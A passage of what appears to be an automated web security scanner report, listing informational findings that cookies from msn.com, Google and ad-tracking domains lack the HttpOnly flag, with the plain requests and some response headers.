The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Ali-Larters-baby-story.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.442. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=8b293f84a2aa4ea6b368d4335862dd47; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=30E3AF4F0D0A410F9D092D52AAF41C17; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.443. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Famous-young-fashionistas.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=c82f5ab0cb294224bb000a6974f275a5; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C19310F2005D4F1DB8577CF5E86AD485; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.444. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=e66a810a6966499c848c1ba70218dee0; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=137AAB2FF8D24D51B3798865AA50C5C3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.445. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=39e0fcaec54545abb6a3f76e640dd1ae; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F24423E8BD6D449F886E536E46A7F8AB; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Javier-Bardem-as-Bond.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.446. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=c077bfedac3744318947cf51dc4f2074; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BD3B28EF1C6441A1BC4270EEDDF93318; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.447. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/New-Superman-chosen.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=0837e2bff64e482a8ade273aa6bc5059; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=4B7DFBB6BC2C4FD9B3731FD23B5B7AC3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/New-Superman-chosen.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.448. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=dc5ede9cf01f4a1d8f38f66ec7f0ee46; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=366EF7F6FBC54B3EAB190688EB1E8AD7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Ozzy-cancels-Reno-show.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.449. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/African-American-History.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=e1af1217f0b44161824e573249566413; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D1B618A0FF6A47629CB585CEFDE91753; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/African-American-History.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.450. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Best-home-remedies.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=ffb0ad538e584c5ba09fbbb9e9181fc9; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C82C0F468D0147E1BC70C15DCFD78642; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Best-home-remedies.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.451. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=68f08c2708d64e29be8348cbb961e750; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=9F16C447874D438CB21CE2DD3C818D30; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.452. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=049adc0a2f954bcdae024e6512e78500; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A6C7330F7D414E7A9C40DFAA3A85381F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.453. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=8d84d7479cf84091870cb3dce77d6db2; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A675B0FE00124BA682A85CAD9ED64F43; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.454. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=317c8099fa3e4490afcb903b3fe5bbba; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E96C99ED5C4A494298EF441C47EDA3C2; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.455. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=ec4f555d8e624b82a3d84cc2ec546076; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=22BC3CB70C554EF0BD773636DE0E5BF8; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.456. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=d0fb5b01c3b841a8918659fa068cda64; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E80A5234DFEE4ED5BC4DFFA52099EB73; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Sled-dogs-slaughtered.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d0fb5b01c3b841a8918659fa068cda64; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E80A5234DFEE4ED5BC4DFFA52099EB73; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

12.457. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=61a54a39f746415393b8f1d36e745375; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=5884B61259D8400AAD004671E5FA168C; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.458. http://specials.msn.com/IEIncreaseFont_preview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/IEIncreaseFont_preview.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=20824d93a5554284a5a17448fb79a5b8; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E05C380373A7429F93DA9DA49BC1BAD1; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IEIncreaseFont_preview.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=20824d93a5554284a5a17448fb79a5b8; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E05C380373A7429F93DA9DA49BC1BAD1; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

12.459. http://specials.msn.com/alphabet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/alphabet.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3c3f37d8deb548dc89c09dac5c3d402b; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=B6BA7A76CD8F4E79AD3497DBAAB626A5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alphabet.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.460. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uuid=4d497b51-ab59-519e-20fe-d56be81950af; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:42:09 GMT
ts=1296661329; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:42:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img HTTP/1.1
Host: sync.mathtag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.461. http://t.invitemedia.com/track_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/track_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.462. http://tags.bluekai.com/site/1463 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/1463

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=VjPsezUR22QsHNJo; expires=Mon, 01-Aug-2011 15:43:39 GMT; path=/; domain=.bluekai.com
bkc=KJh5N1+nsNWDOFeFJLjUW3hAGVtJQ3to5SmQGaSLYufDx3hYXPsAV+u9YNazaSosWOcHggrEaiGrOOPzvsNNW4ynOaKbWDoOWccM9XEcwjBf8lgrjGR4X86fypZct4/Orpl9b+4Vr9YyJ5lZ8IfB1wbqYtuAQ11Fh71klJEUposZINhCLIBP24yZ2egrxtiSUednFqkowYunkFmOoKRZo8fX0pv5o8tukdP7ymhWR20ntpp0ZZUvShzaQK8uQKNAPcGkklyS9Ewk+q2J5NxnH1jMXx9vxWbDzkBKK0GqXJDJaWFE28WlHLsXjo73+HKp6gbxd4eQq/ezI/AfSMAXSqyLjdAZVIeIo1W8MNhgZzfUkrlc3wudHhbtls+jMLBNxrfnxHKy4NE7rMe/E4USyxOy26HQnN7MIi3EZdnSctHd0AK9Au7M1LrDNI8Dld+KmS7KwIRNfgBXlVlzT6l7dlC38wy2MZ4YleI3rc2SdCQHgLdPdC2f6rKEtdlzlQFrhupCmAdBbdYHlNPhdfdAeM6UgMIgdqdfUu7l/ItkOVmGdHt3vc408BQX2XanyqyETUfbigLI0+Nim5hF7an2KjWGz4lVphN/s5wdJEqBwEMeF4F5I9WLRBHj; expires=Mon, 01-Aug-2011 15:43:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.463. http://tags.bluekai.com/site/2748 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2748

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=4uX9rLUR22QsHNJo; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com
bkc=KJh5N1+nsNWDOFeFJAqEwnYuHVNnacpWN/tYxZpaZrOYVyCPvaja+vDNTW/DP0b3WDHWNcPlGxUaHzWvqLu3i2YdGmevqQxHYin5I9eHKLdAlgZKr87Chlp7pcerRURexaWKmJhbkHR953DU3gQciTy4uBB2GqpEXU4Ndeg0nmNejJqzmLI2+VDX/GFV0GOzjT5EENbNEwt6Xdn0TyAydfA2fzPBvU7e1rVNvXJ9Ubl95MRoFHTQ7Xq9Ec7+aKZKjGcRjYG5yimx1fUzkBKKXxmIrWYkBc64KU1zpOrV3P8frSEQzpAweXTIA+rcrJmVG2wsS6cQCPdQd2XtohI8hEnNN8qMhfM6XEtwVCb6n/de5zRccnye4F28fgGXpWlNtrWxzw+xTaztT430ZJF0tZdk4mgcQnWjTfCk0ZFl3r22G8hPf8dysQ2qFrGpfFzVXMX2YU7IcL5pDKbFE5p4n9dWCm+dSFIww/UI8mTQ+dKzKfkWrY8P8lPTpbIqrWXrrYBwCKLwSF2F5hgk4CuzVpvst+IHC7G7E6T+zCdDYmS2sw4MmrfVJcKU8KCfTf0SElVZ0FUn/czGq6pdk2xL2bz8fF6Fh75PN1LK; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqvSDo92HK9b+AjuFm0XdnnXl0RpRaYcTOYyQyZOiRZHZRVOARZoCSskrjZhARVe8k96FpzRBF9qa2rJBtfyD/+ZWJnQDnue1bmgLsrgrsIdQPKlrqrXuckKPsPHKVKrAUOJF24tQvPX4v9fEDl1pYhBnv6+ex0BnRy1exlBM8uepJaMoKOQRzClz6NtSr36eAgyiFgypX7GcQFDa0eGEypJPfUWmQpYyBEWNwMKJ1DW6Bp/01MulmMoWxEwVOQZJoSVagRg0Nl29D9mRNJwQ==; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.464. http://track.roiservice.com/track/LogToDb.asp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.roiservice.com
Path:	/track/LogToDb.asp.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msid936138107000019=a2cc436f07764ff0bdfc512bb07215f0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.465. http://track.roiservice.com/track/track.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.roiservice.com
Path:	/track/track.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

msid936138107000019=a2cc436f07764ff0bdfc512bb07215f0; domain=.roiservice.com; expires=Sat, 01-Feb-2031 15:25:53 GMT; path=/
GTT936138107000019=a2cc436f07764ff0bdfc512bb07215f0; domain=.roiservice.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.466. http://tracking.tree.com/trk/npv-event.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.tree.com
Path:	/trk/npv-event.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1st=3E5A3F6BE25E0C21; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tree.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.467. http://tracking.tree.com/trk/pv.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.tree.com
Path:	/trk/pv.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1st=717B790BCEF95430; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tree.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private,no-cache=Set-Cookie
Pragma: no-cache
Content-Type: image/gif
Expires: Thu, 28 May 2009 00:00:00 GMT,Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 23 Apr 2009 20:07:22 GMT
Accept-Ranges: bytes
ETag: "039b71c4fc4c91:0"
Vary: *
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Set-Cookie: v1st=717B790BCEF95430; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tree.com
Date: Wed, 02 Feb 2011 15:43:41 GMT
Content-Length: 35

GIF89a.............,...........D..;

12.468. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=11a27dc8823c6265:TM=1296661338:LM=1296661338:S=XxDI3af9TXnEOKKO; expires=Fri, 01-Feb-2013 15:42:18 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.469. http://tv.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=61adeaebc4c947bc9a31ca64a303644c; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.470. http://tv.msn.com/last-night-on-tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/last-night-on-tv/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=6e26d8f6fa754507a302411667b60080; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /last-night-on-tv/ HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.471. http://tv.msn.com/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/tv/article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=6b7d0b077d554fe08ea1d656868ae58a; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/article.aspx?news=625989&gt1=28103 HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.472. http://video.google.com/videosearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/videosearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=89236cb0868dd564:TM=1296661357:LM=1296661357:S=WZ2Y1_aytn1alowA; expires=Fri, 01-Feb-2013 15:42:37 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videosearch HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.473. http://vs.dmtracker.com/tags/vs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vs.dmtracker.com
Path:	/tags/vs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1st=180511B6F2B95AA0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.dmtracker.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.474. http://w.ic.tynt.com/b/o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w.ic.tynt.com
Path:	/b/o

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=CgUVaU1JdE1Lz3TsB8qEAg==; expires=Thu, 02-Feb-12 15:12:13 GMT; domain=tynt.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.475. http://wp-superslider.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bb2_screener_=1296661370+173.193.214.243; path=/
wpgb_visit_last_php-default=1296661370; expires=Thu, 02-Feb-2012 15:42:50 GMT; path=/

